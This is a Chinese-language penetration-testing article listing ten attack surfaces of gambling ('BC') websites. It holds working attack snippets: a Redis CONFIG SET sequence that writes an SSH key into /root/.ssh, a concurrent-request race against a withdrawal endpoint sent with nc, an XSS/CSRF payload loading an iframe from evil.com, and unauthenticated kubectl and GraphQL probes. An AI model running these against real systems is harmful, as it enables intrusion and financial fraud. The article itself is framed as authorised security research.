在安全攻防领域,BC站点因其特殊业务属性,往往部署了严密的安全防护体系。本文基于合法授权的渗透测试经验,揭示十个常被忽视的攻击面,为安全研究人员提供专业参考。(注:本文所述技术仅限授权测试场景使用)
一、子域名资产管理盲区
-
1. C段历史解析残留
通过DNSDB等历史记录查询工具,常可发现已下线但未注销的子域名解析记录,结合C段扫描可定位测试/备份环境 -
2. 泛解析证书泄露
利用censys.io检索*.domain.com证书,可发现非常规入口点(如:devops.domain.com、kibana.internal.domain.com)
二、API端点安全盲点
-
3. WebSocket协议鉴权缺失
部分实时赔率接口采用WS协议传输,测试时需特别检查:
import websockets
async def test_ws_auth():
try:
async with websockets.connect('wss://api.domain.com/live') as ws:
await ws.send('{"action":"getOdds"}') # 未授权指令测试
print(await ws.recv())
except Exception as e:
print(f"Connection failed: {e}")
-
4. GraphQL内省查询暴露
对/graphql端点执行内省查询,可能获取后台管理接口字段:
query { __schema { types { name fields { name } } } }
三、业务逻辑深层漏洞
-
5. 活动提现的并发竞争
利用HTTP管道化技术构造并发请求,可突破每日提现次数限制:
echo -e "POST /withdraw HTTP/1.1rn...rnrn
POST /withdraw HTTP/1.1rn..." | nc target.com 443
-
6. 推广系统CSRF链式攻击
当推广链接存在self-XSS时,组合CSRF可实现自动化"发展下线":
<img src="https://target.com/invite?ref=attacker"
onerror="document.write('<iframe src=//evil.com/csrf></iframe>')">
四、基础设施配置缺陷
-
7. K8s集群未鉴权访问
对6443端口执行API探测,可能发现开发环境未配置RBAC:
kubectl --insecure-skip-tls-verify=true --server=https://target.com:6443 get pods
-
8. Redis未授权访问组合利用
当发现6379开放时,可尝试写入SSH公钥:
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "nnssh-rsa AAAAB3NzaC...nn"
save
五、隐蔽数据泄露路径
-
9. Webpack源码映射反编译
通过.map文件还原原始代码:
// 访问/main.js.map
// 使用reverse-sourcemap工具还原
npm install reverse-sourcemap -g
reverse-sourcemap --output-dir src main.js.map
-
10. 日志文件时序预测
部分系统采用日期格式命名日志文件:
https://cdn.domain.com/logs/20240815_access.log # 修改日期遍历下载
原文始发于微信公众号(HACK之道):渗透工程师手册:10个被忽视的BC站点突破口
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论